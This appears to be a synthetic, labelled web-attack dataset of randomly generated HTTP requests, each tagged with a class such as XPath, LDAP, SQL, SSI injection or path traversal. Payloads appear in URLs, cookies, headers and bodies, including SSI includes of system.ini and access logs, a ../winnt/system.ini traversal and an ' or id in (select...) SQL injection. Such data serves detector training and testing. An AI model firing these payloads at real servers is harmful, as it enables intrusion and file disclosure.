Host: www.esytSS.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: compress;q=0.8, gzip, compress, compress;q=0.7, identity
Accept-Language: 5e-sSteha
Cache-Control: min-fresh=31950
Client-ip: 56.128.183.25
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="222"
Date: Sun, 11 Nov 07 18:06:56 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: 100-continue
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Fri, 24 Apr 09 17:31:31 CET
If-Match: *
If-None-Match: "hG_CvAt8556WPghei"
If-Range: Mon, 09 Aug 04 08:31:48 CET
Max-Forwards: 94
MIME-Version: 6.7
Pragma: 8j='g'
Proxy-Authorization: Digest opaque="leSssie"
Authorization: Digest response="C9aF4EC9f3c9b9EB8a5daF58b0fEdBE6"
Range: 10571-03
Referer: http://www.eSms.com/peanlE.gz
TE: trailers,chunked;q=0.2,gzip
Trailer: From
User-Agent: tles/3.1.3
UA-CPU: Sparc
UA-Disp: 911,7505,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 877x3920
Via: HTTP/0.7 197.153.238.123, ot9ne/8.1 215.212.134.2, tti2/7.2 101.210.167.84
Transfer-Encoding: gzip
Upgrade: rkdos/5.2, o56Tt/8.3, Tai2zk/6.6, zoWhhE/4.5
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 11781143207905764900
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43783
Start - Id: 35558
class: XPathInjection
POST /omTd/VSE.css? HTTP/1.0
Content-Length: 107
Content-Language: Okn5rich,s2ee,rPrr3r
Content-Encoding: identity
Content-Location: /mq0stl/fr2rk/Oetbt/e0thh/Eplni7.pdf
Content-MD5: bHNhdHFlc2V0c3Rid3BzMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 13:25:17 UTC
Last-Modified: Tue, 22 Apr 08 04:17:08 UTC
Host: www.rALri.net
Connection: close
Accept: image/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, compress, gzip;q=0.1, compress, identity
Accept-Language: mdld-rToloic;q=0.6, osaekN-swa
Cache-Control: no-transform
Client-ip: 51.72.214.226
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="8"
Date: Sat, 24 Mar 07 23:47:10 GMT
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Tue, 27 Oct 09 13:05:43 UTC
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: *
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 67
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM U3ZOYUNzdG5lZnE4d2V5cGZxTmNzbnByYWxlVzZvTWFyNHRvdGhzcw==
Range: 1158-964,-612192
Referer: /rlsy/tgul/8emaee/e9gmoar.nsf
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (Windows; U; Windows NT 0.9; to-eo; rv:9.4.7) Gecko/01314905
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 174x8533
Via: 9.4 1.19.245.236
Transfer-Encoding: identity
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 491 www.obverec.js "eapntohnl" "Thu, 19 May 05 14:19:45 GMT"
X-Forwarded-For: 110.77.12.7
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

skate=0ranent5athcdr4n&XfcatL=sshto']   | P    |    //user[  name/text(    )   ='oe

End - Id: 35558
Start - Id: 38825
class: LdapInjection
GET /x8R_ooKrGP-2d/aT2BCUbdN-/efm_yG.vGK@jq4A2rD2.gif?M6QA=013988&tehe6=%29%28+++%7C%28+++cn%3D*o+++%27brien*+%29%28mail%3D*o+%27brien*%29&2xml9N@.7pKdr=pemedljvenontat&mfdmrerigeE=a2lau&eitmzahi4o=nouefkIra&tiubT=wK HTTP/1.1
Host: 97.92.104.2
Connection: close
Accept: image/*;q=0.0, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aaa-ha;q=0.3, stt8nEd-neFanze;q=0.1, atday-e;q=0.0, 0-wlRea
Cache-Control: no-transform
Client-ip: 185.154.215.93
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="66"
Date: Thu, 31 Jul 08 14:56:23 GMT
ETag: "AVp7OglEB-OHv29FF"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Wed, 23 Dec 09 23:45:29 CET
If-Unmodified-Since: Mon, 27 Dec 04 18:14:23 GMT
If-Match: "bCxFaZOmHfiAdC3ALLb"
If-None-Match: "IeuYrU2pEI-U5rqq"
If-Range: Thu, 25 Jan 07 09:04:49 UTC
Max-Forwards: 3900
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM aWxhZnJzc2Nlc2ZvRWF0bWVwc3Jlb3NzaWFzZG9lNXVnbGRhcmh1aGU=
Range: 55524-
Referer: /awtaNd/98Ztsp.wmn
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.4 (X11; U; Unix 1.3; u5-i6; rv:6.4.2) Gecko/04580344
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/6.2 www.iAlood.png
Transfer-Encoding: gzip
Upgrade: wnz/1.4, E79wa/9.8, 1dvs/2.3
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38825
Start - Id: 40412
class: SSI
POST /afR/onaHI4CDfU/q@/7eladairximllddraete/iuxrst9uKll/ycyrifnbroruzYaauet/HoR@.@uzF.png? HTTP/1.0
Content-Length: 336
Content-Language: pzoSe
Content-Encoding: compress
Content-Location: /yjksawgE/Juoess/ersismn/0Alc.php4
Content-MD5: cGxlbjJidHJiaGV1QW9Fbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Dec 04 03:56:11 GMT
Last-Modified: Fri, 08 Dec 06 09:32:30 CET
Host: www.oa7itoe7b.cz
Connection: keep-alive
Accept: video/*
Accept-Charset: euc-cn, iso-2022-jp, windows-1255, iso-2022-kr
Accept-Encoding: compress, deflate;q=0.3
Accept-Language: *
Cache-Control: max-stale=49462
Client-ip: 21.209.58.212
Cookie: nmmstis=drbgeeda oas;blete=83;tt=tdcymedRtaLeZqt;1eet=n3HvV;rordmrl6n7reqea=wed4alll;tnxAsNareie=eeo~C
Cookie2: $Version="3"
Date: Fri, 22 May 09 12:28:50 CET
ETag: W/"5EI0NvigZQ0wYh_Mhu1T"
Expect: Ez1ltad3=mhoy;Tonfn54
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Tue, 09 Mar 10 05:13:46 CET
If-Unmodified-Since: Sat, 25 Nov 06 05:35:55 UTC
If-Match: *
If-None-Match: "xobaa6lqsa0xLm6"
If-Range: Thu, 04 Jun 09 22:58:57 CET
Max-Forwards: 085
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: Basic cDI4Y3pzOmR1amE5cw==
Range: -636429,-84349,684171-
Referer: http://miunTb.com/y0strrxm/mresvet/5gdu/jcfsaoan.zip
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: itoe3 (eYEUyw3V.; iEgKjTI; nHryGE)
UA-CPU: 68000
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5480x145
Via: HTTP/7.9 www.aigatded.png
Transfer-Encoding: deflate
Upgrade: ufb/8.5, d45i3/7.9
Warning: 389 77.79.203.151 "rgu8ceCttvaeeZctdwT" "Tue, 30 Dec 08 18:23:42 CET"
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~

z7r=sock_stream+%3B%3FIs&3iafal34us7ofdG=%3C%21--++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&E0-B%uEAuYf5k=sandetau-e1+Iyo%7Cops&nfs=020136&2Cnnnil=ptmRo&9k9fal9=1141977814&tm9lpGacd7=oi7Ttdam6Pn04si1de&xuxxie=T5-haAuA+r%3Ahsock_stream8&iaiFeh=htacces&988dy1gInnwti5R=%28Oeneaz&np17Rternr=cy&aT2sa3ean=einput5w71r

End - Id: 40412
Start - Id: 38499
class: LdapInjection
GET /mwbiRtT0xVJ1rgCjxzp/aasrrftrtBrf0/nrllu/jrbft/HWt3JnullmWincluded2j/g2gn/piTBLWnBGth.ODDEkiR@.pl?epctIeeiedu=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Csjeiao=%5Be&rehe51l=6520327 HTTP/1.0
Host: www.ahthOev.be
Connection: close
Accept: audio/*;q=0.8, audio/x-wav
Accept-Charset: iso-8859-5, gb2312, iso-8859-8-i;q=0.2, iso-8859-4, windows-1258
Accept-Encoding: 
Accept-Language: etwr-wholpn, imnlwh-gmhc;q=0.4, g-yeN;q=0.0
Cache-Control: max-age=569
Client-ip: 13.141.85.224
Cookie: yg8tT6h=65;_8RnH=eftas<cSopensehrsetc;3toh=rgEyx2;weerccTgsan568t=tstaee0ettt8iit;snH7h=@g|madmiouit8 shutdownr2;-q9B3=8P3y=a\vpositionagroup byohAr]all@5
Cookie2: $Version="61"
Date: Sun, 02 May 04 12:07:10 CET
ETag: "@oxpL@CZ7HOtjkNK"
Expect: rae1
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 10 Aug 08 15:51:51 CET
If-Unmodified-Since: Tue, 31 Jul 07 16:58:38 CET
If-Match: "Z6q0O2l0nodqPLsCC"
If-None-Match: "O_Y@lMwjEDIcLyO.5g"
If-Range: Thu, 20 Sep 07 16:17:05 CET
Max-Forwards: 01
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Digest username="fphe"
Range: 108364-
Referer: http://ayegLai.biz/nsnsla.asp
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: xkzbthmbe (sV6RwC9BA; hwtp5av@; u0ZxmU@Nx; 4twOC8LPNY; n9jzBypc5)
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9397x4761
Via: 9.3 www.txnpbisi.png
Transfer-Encoding: identity
Upgrade: hiE/0.7, ube/1.1
Warning: 802 67.80.132.59 "ootesotn" "Fri, 23 Jun 06 21:53:41 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38499
Start - Id: 38193
class: LdapInjection
GET /aBa49YtVM@t/qPjQ-.OCSHmailF/qCryoi0aoBtid5g.asp?ftzt=ArntE%29%28%7C++++%28sni%3D*%29&CqykR9KHJ=90&acCeth=c&rini.euDJLL=d&I.xQMLu0t=rhome&Iu=790 HTTP/1.1
Host: 126.236.198.1
Connection: keep-alive
Accept: text/plain, audio/x-wav;q=0.8, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale=9
Client-ip: 245.205.142.82
Cookie: kNprocessing-instructiontmpwtDbP=Ui n4
Cookie2: $Version="97"
Date: Sun, 04 Oct 09 08:03:06 CET
ETag: "vxlxB6t-fP8@XzKMO8w"
Expect: anoae=Rywdsuv
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 25 Jan 05 14:43:53 CET
If-Unmodified-Since: Tue, 13 Apr 10 23:15:38 UTC
If-Match: *
If-None-Match: "1h39WETND68lAI6D"
If-Range: Mon, 15 Nov 04 24:15:44 UTC
Max-Forwards: 50
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: Basic bWF1c0U6TWJFb2I=
Range: -49,281-
Referer: http://ilg5t.de/oicog/wtre7/Yxaeeqso/Rkoe/aonhra.jpeg
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 9.8; im-rs; rv:3.1.4) Gecko/31891878
UA-CPU: PowerPC
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5505x7135
Via: HTTP/0.9 115.157.193.152, 9.6 40.50.173.120
Transfer-Encoding: ndeA
Upgrade: aec/9.2, nnrn/6.5, ldi/7.0, 7et/3.4, auo/7.2
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38193
Start - Id: 44808
class: PathTransversal
GET /1-oK/g2r3ee/uV5h@s7-.asp?dyltsguSrdmeesD=868&oHoui=9%2Fahj&tTfRidtogn=herom%3D&nt2ohpfobd=529915&wAa=1&atmi63taqaas=6&eieumug=file%3A%2F%2F%2Fe%3A%2FohM%2Fliiu%2Fa6ldruc.xml&vU=ahiloeeuo&epMt9oar3R=3008535&9ond=RO&ftpCmLshttpn=zda&4qpyrmGhKR72o=snohgttcergd&Odoe38ybfhodph=fmrpo HTTP/1.0
Host: 53.78.78.213
Connection: nuetoo
Accept: image/png;q=0.2, application/rtf
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, identity;q=0.7, identity;q=0.7
Accept-Language: *
Cache-Control: Loo='at8se'
Client-ip: 162.199.90.42
Cookie: eqsc=8878;eEOFtbtefh8e=gyunionihttp winntuvnvtwosar;eksdb=eAwCtth%
Cookie2: $Version="8"
Date: Fri, 19 Mar 10 16:40:31 GMT
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 3wznn
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 09 Mar 08 04:49:59 CET
If-Unmodified-Since: Mon, 12 Jan 04 10:21:28 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Oct 04 20:37:42 CET
Max-Forwards: 5
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVlYmloMTpvYWxyb2Yx
Authorization: ikho9 ta2z=kpen
Range: -970
Referer: http://www.citLs.fr/tom6E/wrt5elE.mdb
TE: chunked;q=0.0
Trailer: Pragma
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 8.6; zr-nc; rv:4.2.8) Gecko/91015037
UA-CPU: PowerPC
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 1.9 40.6.132.169, 1.9 217.103.58.181
Transfer-Encoding: gzip
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 20.26.247.44
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44808
Start - Id: 48429
class: XPathInjection
GET /cOQiJ31httpsCstdin_O2dropQ/o8_X3PCl/rselitpui8daeaAq.cfm?6xafSmHNwindow.open0=hPcz%404i_Z&nhT0moo0tadgd=ii&el=ItiframeRsock_streamexival&sgM.Q=7e%25u4objectna&pZUobjectPbodyb=sllrdirtetrO&ae9rw90pievlsc=1949&yiBlq=wQfDCw7&IgQcc@nvbscript5bbU=shy9sehiu4id&rrilnln=7912646&tdz=bsi6&Y69d9_-ohtaccesJ-=t8-&Sd=%40%26t&FselectwgNYh@iKPe=nm.&yu2=3994370 HTTP/1.0
Host: 192.20.219.79:80
Connection: neIha7vh
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.1, x-mac-cyrillic, x-mac-arabic;q=0.4, x-mac-ce;q=0.8
Accept-Encoding: gzip
Accept-Language: Ak-iastlt;q=0.3, 2l-eild;q=0.1
Cache-Control: no-store
Client-ip: 161.32.126.160
Cookie: osnrrv3hr=ii582XH4tKNa;tw=|9diethsuzr1me;sqzeekNzueDoe=7;t7rjioEearan=xoiuhl'     or     6 <    count(path/child::*)   or    'aS'  =    ';loMSayeih=e)0
Cookie2: $Version="47"
Date: Tue, 14 Jun 05 20:52:56 CET
ETag: W/"u4Uzi4Ou4UqKUGiydh"
Expect: b9rifpe
From: Jhte@ioNeu6fte.fr
If-Modified-Since: Fri, 08 Oct 04 17:56:24 UTC
If-Unmodified-Since: Tue, 18 Oct 05 01:18:30 GMT
If-Match: *
If-None-Match: "5nbAxZIKZa2wmxpB."
If-Range: "S6QAW0Gx9nvC4EL79M"
Max-Forwards: 32
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic eHRueXVjOmRvcnBwb2U=
Authorization: Digest uri=http://lqlr.fr/dntaey/dLnc/w5sLyw.asp
Range: -88510,-99
Referer: http://tmcosa.net/dklin5c4.sh
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/3.2 (X11; U; Open BSD i386 7.0; an-3g; rv:5.6.8) Gecko/34256655
UA-CPU: MIPS
UA-Disp: 842,949,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 679x1552
Via: 4.6 10.62.226.163, 7.7 www.nedrK.jpeg
Transfer-Encoding: aH7io5
Upgrade: 7eaeH/4.4
Warning: 812 www.ewsMWm.shtml "10oeOab" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 2509612458
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48429
Start - Id: 36224
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.oSen.be:80
Connection: 67Wy
Accept: */*
Accept-Charset: euc-kr, x-mac-roman;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=125
Client-ip: 253.92.235.246
Cookie: Yiaibgtu6fwi=108666;3RYatd=jqA
Cookie2: $Version="659"
Date: Mon, 11 Feb 08 14:26:09 GMT
ETag: W/"3f1XJysaM8JKnKP718"
Expect: 100-continue
From: maal4k@enPaImpyhd.st
If-Modified-Since: Mon, 21 Feb 05 05:42:28 CET
If-Unmodified-Since: Fri, 18 Nov 05 21:33:03 CET
If-Match: "QSjhJEwz4sUqmOX.mK2"
If-None-Match: "L5ApjO1QIDT3CZbXXwz"
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 4
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM dHNib2FvOHNiYTlmcnVzdHBzOTBsZHRjZ3J3bmF0ZmhtYWE=
Range: 183-
Referer: http://www.tae3aot.be/otdsspdr/erer4Iip/tsrIa/Zzdh7ebn/roe42s.wmn
TE: deflate,chunked;q=0.3
Trailer: Accept-Language
User-Agent: urFDdj65v http://www.sm4ss1ak.fr
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: FTP/0.7 www.ebnW.jpg, FTP/4.2 www.l7lb.css
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36224
Start - Id: 50025
class: XPathInjection
POST /wyGSWIA8echoy/tvbQFXGGMU5kTfb/nmNcEoe0otrdayjs/tz77PJWD/v5r1tiireuhoRiv/p3jfT1PdAJlK/fafej/mrYz.oJ.gif? HTTP/1.0
Content-Length: 223
Content-Language: eur6n,qr3,9loin
Content-Encoding: identity
Content-Location: /so0tmtu/UOnzt.cgi
Content-MD5: dGVlbGVheXBhRmhxZ29kaQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 07 Aug 07 17:31:27 GMT
Host: 41.235.183.51
Connection: prow9Ses
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: (i     <  count(wle/child::text())  and  j   <     count(tm7k/child::comment())    and k     <  count(9d/child::*)  )
Cache-Control: min-fresh=4
Cookie: WVR21rFfz=a ss5locationicopy winntaesi;82Pn6Zunion=ZigreplaceIntdo/mf2location;hcto87phae=ab]&at;nWoanints6Wmn=cse;6BHM2=85017;btT9wA6=hVjJeIT
Cookie2: $Version="1"
Date: Sat, 25 Nov 06 17:54:49 GMT
Expect: 100-continue
From: nedh@e0uheaoepd.com
If-Modified-Since: Wed, 30 Aug 06 18:16:18 GMT
If-None-Match: *
If-Range: Wed, 25 Nov 09 18:20:00 GMT
Max-Forwards: 770
Proxy-Authorization: Basic bm9ldzhpdTpuaHRubw==
Authorization: Digest username="1oupNa6o"
Referer: http://swrs.st/meas/fe1ol2/eu7etiu.jsp
TE: gzip;q=0.8,trailers,gzip
User-Agent: rDrapr (ksof8IL; u.ggWVCPiZ; e@x6M2S)
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 412x6538
Via: 9.8 228.53.74.226:823
Transfer-Encoding: identity
Upgrade: odsrn/7.3, noifE/8.7
----: -------------------

gU5AiFwhere2exec2hz=1665&sblynczhi4eem1=m1&eb0eaSh2p8i=0&socaoa00=845110&7h=jio&ujof6ritASfiAam=exec&0ARsId4uraa=08417579&zcehpq=ayPdK&tjhs3ecstoee=37559863&67MuZvfhl=tysseeeDlefa&rpe1eswthar=SeSlesF&8xp=:nalracowwlatn a2

End - Id: 50025
Start - Id: 41244
class: SqlInjection
GET /fteelwixmkcSoiynao0h/AV7MyHadocument2X0qNL@/4qrzjwehtlss/rN-qxxCEIxOfn@20/eKGGvFTwrnu/6us/tfokATwSmmues/ygae0k4sitauriuk/HoNNe4Vwscript_q/nN9scurneenamjeatnt/tqmaTospyg.jpeg? HTTP/1.0
Host: www.aoIuldcHe.org
Connection: 9eoix
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.9, gzip;q=0.8, identity
Accept-Language: ' or   id  in     (    select  *   from     user_db  )
Cache-Control: only-if-cached
Client-ip: 251.101.157.72
Cookie2: $Version="2"
Date: Fri, 17 Apr 09 03:56:51 CET
ETag: W/"qVHVETCstnO6syV"
Expect: auPvos
From: rrsuzrl@rerpmueo6.uk
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 17 Jun 05 15:46:05 GMT
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: "fx.pk1bS2L0Jx--N"
Max-Forwards: 7
MIME-Version: 4.4
Pragma: d='Ioemim'
Authorization: Basic aUlnRWF1OmltZFhpZg==
Referer: http://xsubtLah.cz/seoj6t/ggons6/0aERs/asaaf5oa/9tcaq.css
TE: chunked,trailers,gzip;q=0.7
Trailer: Warning
User-Agent: EiamiezanopojO9iai
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
Via: 5.4 2.32.141.59, 7.6 136.67.91.118:3, FTP/2.0 www.m6Npe.gif
Transfer-Encoding: identity
Upgrade: nI4c/2.6
Warning: 477 www.7dRpedkh.jpeg "eynniese" 
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41244
Start - Id: 49306
class: XPathInjection
GET /fIV0k8n7lHechoD1I9/s27wjsLh/iBdn.Wg5_v/sgLFbN_uDSk.cgi?onnptkh=5496979870&sktP5it0=7&7sptuerrltGt=hyH%40GKEYIC7K&noaniee=wttah%2Flz%2FAid6%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D30%5D+++++%7C+k%2Fbieair%2Fnrg9ap%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++++or++++%27sU%27++++%3D++++%27&ihzeArllf=insertswewgs7+&WAgs2e=1221394995&nYaK3uW=nu%29Eu&9dfazl7etse=dP3wJNnnHF HTTP/1.0
Host: www.rntetngn.gov
Connection: close
Accept: audio/*;q=0.6, application/postscript, application/zip;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: imhnie-sAmiw;q=0.7
Cache-Control: min-fresh=67
Client-ip: 249.173.49.26
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="01"
Date: Wed, 15 Aug 07 03:11:48 GMT
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 01 Dec 06 23:04:55 UTC
If-Unmodified-Since: Sat, 07 May 05 17:06:36 UTC
If-Match: "eZVfXv@bAQ9L_nCq"
If-None-Match: *
If-Range: Wed, 09 Aug 06 24:17:31 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: ir=9
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: /urvt/p5sMce.swf
TE: deflate;q=0.5,gzip;q=0.0,trailers
Trailer: Date
User-Agent: oeurkcraTtm57Isqie
UA-CPU: StrongARM
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: 8.7 www.R8ag.htm
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 902784
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49306
Start - Id: 38163
class: LdapInjection
GET /zorattsebnqC/scM/ea/3wsf-@NWY6PZhqv_Gh/tkTF5lcGaD2ht-b/tgdptENarrRp/T0wRLA/ite7oo8zn/ep5jJa1HamyZe2mD/au.css?v3M9TmretcaNH=iemaclorm9&2eedet=whx&sifwAIttOtw=xbnph-&Be1u9anukT=iq8%40passthru&t7y6eqt=865&r5Rvsr=san1w%29%28%26%28objectClass%3D++rei9*%29&d6=142744827&gsanEiuoc=aorzriiYy&ynuotHt=765565 HTTP/1.0
Host: www.tegO2orE.net
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: ai-toe, RE-o;q=0.9
Cache-Control: no-transform
Client-ip: 149.141.102.19
Cookie: teo=7739323081;Ahpth9=9
Cookie2: $Version="4"
Date: Wed, 30 Aug 06 09:42:45 UTC
ETag: W/"oYZOAXe-lop@UENF"
Expect: itgdtcl=icezz
From: 7enqeIo@sjtoi.net
If-Modified-Since: Tue, 20 Mar 07 13:44:21 GMT
If-Unmodified-Since: Tue, 25 Nov 08 10:44:52 CET
If-Match: "1Ouy9-@oIfwoxEs"
If-None-Match: *
If-Range: "xlR7Pn_83nNJ1pSzF4FU"
Max-Forwards: 1916
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: Digest username="ivnI"
Range: 8-,-63
Referer: http://tesit.st/AbgOsdhn/beeaad.exe
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.9 (Windows; U; WinNT 1.6; 0c-eH; rv:3.9.0) Gecko/72570868
UA-CPU: PowerPC
UA-Disp: 745,764,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: 0.5 www.ofmk6rga.jpg
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 155.87.202.213
X-Serial-Number: 276586158043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38163
Start - Id: 39498
class: SSI
GET /lhYDB0@DxV2L6f.wPJ/vdt8aDp9tljtOtcdiaeb/dsteiesseonoi/epure/etashsoneanrrcBdisa/c5LUJ5Zhw8o/s20bGjNxoGsQox@7i5GH/ukw6ccjbq7Jk7fhS.png? HTTP/1.0
Host: www.nrlpe8n.uk:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2;q=0.2
Accept-Encoding: <!--#include     virtual="/var/log/httpd/access.log"     -->
Accept-Language: *
Cache-Control: max-stale
Cookie: t1no7=uyQ;ensrdygeod=0135357;cRdf9opftaea=f_eYRr5K;teittdnm7meb=ah1XwXW7U
Date: Sun, 17 Sep 06 10:15:34 UTC
ETag: W/"WZNJPRVhwKs5WbH1Gdm"
Expect: 100-continue
From: ht0lf1pa@dg8r.cz
If-Modified-Since: Thu, 25 Mar 10 20:00:41 UTC
If-Unmodified-Since: Sun, 25 Jun 06 21:31:58 UTC
If-None-Match: *
